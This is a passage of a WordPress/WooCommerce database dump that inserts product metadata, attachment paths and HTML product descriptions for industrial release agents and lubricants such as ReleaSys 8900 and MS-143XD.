INSERT INTO `wp_postmeta` VALUES (779, 308, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (780, 308, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (781, 308, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (782, 308, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (783, 308, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (784, 308, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (785, 308, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (786, 308, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (787, 308, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (788, 308, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (789, 308, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (790, 308, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (791, 308, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (792, 308, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (793, 308, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (794, 308, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (795, 308, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (796, 308, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (797, 308, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (798, 308, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (799, 308, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (800, 308, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (801, 308, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (802, 308, '_product_image_gallery', '1740'); 
INSERT INTO `wp_postmeta` VALUES (803, 308, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (804, 310, '_edit_lock', '1497632223:3'); 
INSERT INTO `wp_postmeta` VALUES (805, 310, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (806, 310, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (807, 310, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (808, 310, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (809, 310, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (810, 310, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (811, 310, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (812, 310, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (813, 310, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (814, 310, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (815, 310, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (816, 310, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (817, 310, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (818, 310, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (819, 310, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (820, 310, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (821, 310, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (822, 310, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (823, 310, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (824, 310, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (825, 310, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (826, 310, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (827, 310, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (828, 310, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (829, 310, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (830, 310, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (831, 310, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (832, 310, '_product_image_gallery', '1787'); 
INSERT INTO `wp_postmeta` VALUES (833, 311, '_wp_attached_file', '2016/08/ReleaSys-8900.jpg'); 
INSERT INTO `wp_postmeta` VALUES (834, 311, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:25:"2016/08/ReleaSys-8900.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8900-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"ReleaSys-8900-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"ReleaSys-8900-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"ReleaSys-8900-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8900-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"ReleaSys-8900-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"ReleaSys-8900-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"ReleaSys-8900-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (835, 310, '_thumbnail_id', '4178'); 
INSERT INTO `wp_postmeta` VALUES (836, 312, '_edit_lock', '1496845891:2'); 
INSERT INTO `wp_postmeta` VALUES (837, 312, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (838, 312, '_ywtm_text_tab', '<strong>Technical Data&lt;/font&gt;</strong>'); 
INSERT INTO `wp_postmeta` VALUES (839, 312, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (840, 312, '_ywtm_order_tab', '2'); 
INSERT INTO `wp_postmeta` VALUES (846, 310, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (863, 312, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (864, 312, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:16:"FontAwesome:book";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (865, 312, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (866, 312, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (867, 312, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (868, 312, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (869, 312, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (870, 312, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (871, 312, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (872, 312, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (873, 312, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (874, 312, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (875, 312, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (876, 317, '_edit_lock', '1474982889:2'); 
INSERT INTO `wp_postmeta` VALUES (877, 317, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (878, 317, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (879, 317, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (880, 317, '_ywtm_order_tab', '5'); 
INSERT INTO `wp_postmeta` VALUES (881, 317, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:20:"FontAwesome:question";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (882, 317, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (883, 317, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (884, 317, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (885, 317, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (886, 317, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (887, 317, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (888, 317, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (889, 317, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (890, 317, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (891, 317, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (892, 317, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (893, 317, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (894, 310, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 91px;" width="385">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>Clear</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>Alcohol</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.4 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>&gt;50 C</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (895, 310, '317_default_editor', 'One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (896, 310, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (897, 310, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (898, 310, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (899, 310, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (900, 310, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Thermoset Polysiloxane\r\nAppearance:………...Clear\r\nOdor:…………………Alcohol\r\nSpecific Gravity:…….1.4 g/mL @ 25°C\r\nFlash Point…………..&gt;50°C\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8900 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials\r\n<table style="height: 64px;" width="640">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Elastomers (Natural and Synthetic)</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Neoprene</td>\r\n<td width="168">•          Melamine</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (901, 310, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (902, 310, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (903, 310, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (904, 310, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (908, 318, '_edit_lock', '1474982927:2'); 
INSERT INTO `wp_postmeta` VALUES (909, 318, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (910, 318, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (911, 318, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (912, 318, '_ywtm_order_tab', '4'); 
INSERT INTO `wp_postmeta` VALUES (913, 318, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:20:"FontAwesome:download";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (914, 318, '_ywtm_layout_type', 'download'); 
INSERT INTO `wp_postmeta` VALUES (915, 318, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (916, 318, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (917, 318, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (918, 318, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (919, 318, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (920, 318, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (921, 318, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (922, 318, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (923, 318, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (924, 318, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (925, 318, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (926, 310, '318_default_editor', 'Please Call'); 
INSERT INTO `wp_postmeta` VALUES (927, 308, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (928, 308, '317_default_editor', '12 oz Aerosol (MS-153A), Quart, Gallon'); 
INSERT INTO `wp_postmeta` VALUES (929, 308, '318_default_editor', 'Please Call'); 
INSERT INTO `wp_postmeta` VALUES (930, 308, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (931, 308, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (932, 308, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (933, 308, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (934, 308, '_ywtm_content_tab_description', '<strong> Applications:</strong>\r\n<ul>\r\n 	<li>Casting metals such as magnesium</li>\r\n 	<li>High Temperature and difficult to mold polymers and composites</li>\r\n 	<li>Mold dressing for powder metal processing</li>\r\n 	<li>Surface coating for high temperature surfaces that require clean, lubricated surfaces such as in glass making and metal working</li>\r\n 	<li>Specialty lubricant for drawing and working metals</li>\r\n 	<li>High and low temperature dry film</li>\r\n 	<li>Barrier coating for aggressive environmental processes</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (935, 308, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (936, 308, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (937, 308, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (938, 308, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (939, 297, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 143px;" width="336">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="133">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>Light Yellow Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (940, 297, '317_default_editor', 'One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (941, 297, '318_default_editor', '<a href="https://www.miller-stephenson.com/Content/pdfs/ReleaSys 8200.pdf" target="_blank">DOWNLOAD TDS</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (942, 297, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (943, 297, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (944, 297, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (945, 297, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (946, 297, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Fluoropolymer\r\nAppearance:………...Light Yellow Emulsion\r\nOdor:…………………None\r\nSpecific Gravity:…….1.0 g/mL @ 25°C\r\nFlash Point…………..None\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8200 is formulated to provide unmatched utility and economy in compression and transfer molding, particularly with Rubber to Metal bonding. ReleaSys 8200 is compatible with the following materials\r\n<table style="height: 142px;" width="636">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          Fluorosilicones</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Nitrile</td>\r\n<td width="168">•          SBR</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Chlorinated Polyethylene</td>\r\n<td width="168">•          Natural and Synthetic Rubber</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/Content/pdfs/ReleaSys 8200.pdf">Technical Data Sheet</a>'); 
INSERT INTO `wp_postmeta` VALUES (947, 297, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (948, 297, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (949, 297, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (950, 297, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (952, 320, '_wp_attached_file', '2016/08/Calendar-Print-Preview-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (953, 310, '318_custom_list_file', 'a:2:{s:32:"91af3b8a0b762af1624bb6bbf73fff11";a:3:{s:4:"name";s:31:"ReleaSys 8900 Release Agent TDS";s:4:"file";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8900-2.pdf";s:4:"desc";s:31:"ReleaSys 8900 Release Agent TDS";}s:32:"5baf288c8bd4aacbcf343e800fd12a34";a:3:{s:4:"name";s:39:"ReleaSys Release Agent Product Overview";s:4:"file";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf";s:4:"desc";s:39:"ReleaSys Release Agent Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (954, 321, '_wp_attached_file', '2016/08/122AV.pdf'); 
INSERT INTO `wp_postmeta` VALUES (955, 322, '_wp_attached_file', '2016/08/122SE.pdf'); 
INSERT INTO `wp_postmeta` VALUES (956, 323, '_wp_attached_file', '2016/08/143TE.pdf'); 
INSERT INTO `wp_postmeta` VALUES (957, 324, '_wp_attached_file', '2016/08/550N-552N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (958, 325, '_wp_attached_file', '2016/08/580N-582NB.pdf'); 
INSERT INTO `wp_postmeta` VALUES (959, 326, '_wp_attached_file', '2016/08/At-A-Glance.pdf'); 
INSERT INTO `wp_postmeta` VALUES (960, 327, '_wp_attached_file', '2016/08/Dental-Lubricant-instructions.pdf'); 
INSERT INTO `wp_postmeta` VALUES (961, 328, '_wp_attached_file', '2016/08/Dental.pdf'); 
INSERT INTO `wp_postmeta` VALUES (962, 329, '_wp_attached_file', '2016/08/Fluoropolymer-PTFE-coatings.pdf'); 
INSERT INTO `wp_postmeta` VALUES (963, 330, '_wp_attached_file', '2016/08/Krytox-Tri-Fold.pdf'); 
INSERT INTO `wp_postmeta` VALUES (964, 331, '_wp_attached_file', '2016/08/milGlide-advanced-medical-lubricants.pdf'); 
INSERT INTO `wp_postmeta` VALUES (965, 332, '_wp_attached_file', '2016/08/milGlide-master-batch.pdf'); 
INSERT INTO `wp_postmeta` VALUES (966, 333, '_wp_attached_file', '2016/08/milLube-advanced-medical-lubricants.pdf'); 
INSERT INTO `wp_postmeta` VALUES (967, 334, '_wp_attached_file', '2016/08/milPure-specialty-solvents.pdf'); 
INSERT INTO `wp_postmeta` VALUES (968, 335, '_wp_attached_file', '2016/08/milShield-advanced-medical-lubricants.pdf'); 
INSERT INTO `wp_postmeta` VALUES (969, 336, '_wp_attached_file', '2016/08/MS-780-782.doc'); 
INSERT INTO `wp_postmeta` VALUES (970, 337, '_wp_attached_file', '2016/08/ReleaSys-82.pdf'); 
INSERT INTO `wp_postmeta` VALUES (971, 338, '_wp_attached_file', '2016/08/ReleaSys-85.pdf'); 
INSERT INTO `wp_postmeta` VALUES (972, 339, '_wp_attached_file', '2016/08/ReleaSys-88.pdf'); 
INSERT INTO `wp_postmeta` VALUES (973, 340, '_wp_attached_file', '2016/08/ReleaSys-89.pdf'); 
INSERT INTO `wp_postmeta` VALUES (974, 341, '_wp_attached_file', '2016/08/ReleaSys-8200.pdf'); 
INSERT INTO `wp_postmeta` VALUES (975, 342, '_wp_attached_file', '2016/08/ReleaSys-8500.pdf'); 
INSERT INTO `wp_postmeta` VALUES (976, 343, '_wp_attached_file', '2016/08/ReleaSys-8800.pdf'); 
INSERT INTO `wp_postmeta` VALUES (977, 344, '_wp_attached_file', '2016/08/ReleaSys-8900.pdf'); 
INSERT INTO `wp_postmeta` VALUES (978, 345, '_wp_attached_file', '2016/08/ReleaSys-Product-Guide.pdf'); 
INSERT INTO `wp_postmeta` VALUES (991, 346, '_edit_lock', '1471522727:3'); 
INSERT INTO `wp_postmeta` VALUES (992, 346, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (993, 306, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 137px;" width="471">\r\n<tbody>\r\n<tr>\r\n<td width="123">Primary Polymer:</td>\r\n<td width="211">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Appearance:</td>\r\n<td width="211">White particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Odor:</td>\r\n<td width="211">Slight</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Specific Gravity:</td>\r\n<td width="211">1.58 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td width="123">Ozone Depletion:</td>\r\n<td width="211">0.00</td>\r\n</tr>\r\n<tr>\r\n<td width="123">VOC</td>\r\n<td width="211">Exempt</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (994, 306, '317_default_editor', 'Quart, One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (995, 306, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (996, 306, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (997, 306, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (998, 306, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (999, 306, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:….Fluoropolymer\r\nAppearance:……….White Particle suspension\r\nOdor:………………..Slight\r\nSpecific Gravity:……1.58 g/mL @ 25°C\r\nOzone depletion……0.00\r\nVOC…………………Exempt\r\n\r\n<strong>Release Agent Applications</strong>\r\n\r\nMS-143XD can be used to release the following materials with virtually no transfer of the release agent:\r\n<table style="height: 135px;" width="321">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (1000, 306, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1001, 306, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1002, 306, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (1003, 306, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (1004, 347, '_edit_lock', '1486560868:2'); 
INSERT INTO `wp_postmeta` VALUES (1005, 347, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (1006, 348, '_wp_attached_file', '2016/08/Aerospace-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1007, 349, '_wp_attached_file', '2016/08/Automotive-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1008, 350, '_wp_attached_file', '2016/08/Chemical-Stability-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1009, 351, '_wp_attached_file', '2016/08/FPG-028.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1010, 352, '_wp_attached_file', '2016/08/FPG-182-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1011, 353, '_wp_attached_file', '2016/08/GPL-226227.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1012, 354, '_wp_attached_file', '2016/08/GPL-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1013, 355, '_wp_attached_file', '2016/08/Krytox-Compatibility.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1015, 357, '_wp_attached_file', '2016/08/LVP-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1016, 358, '_wp_attached_file', '2016/08/MIL-PRF-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1017, 359, '_wp_attached_file', '2016/08/Reactive-Chemicals-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1018, 360, '_wp_attached_file', '2016/08/TS4-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1019, 361, '_wp_attached_file', '2016/08/XHT-PDF.pdf'); 
INSERT INTO `wp_postmeta` VALUES (1020, 347, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (1021, 347, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (1022, 347, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td 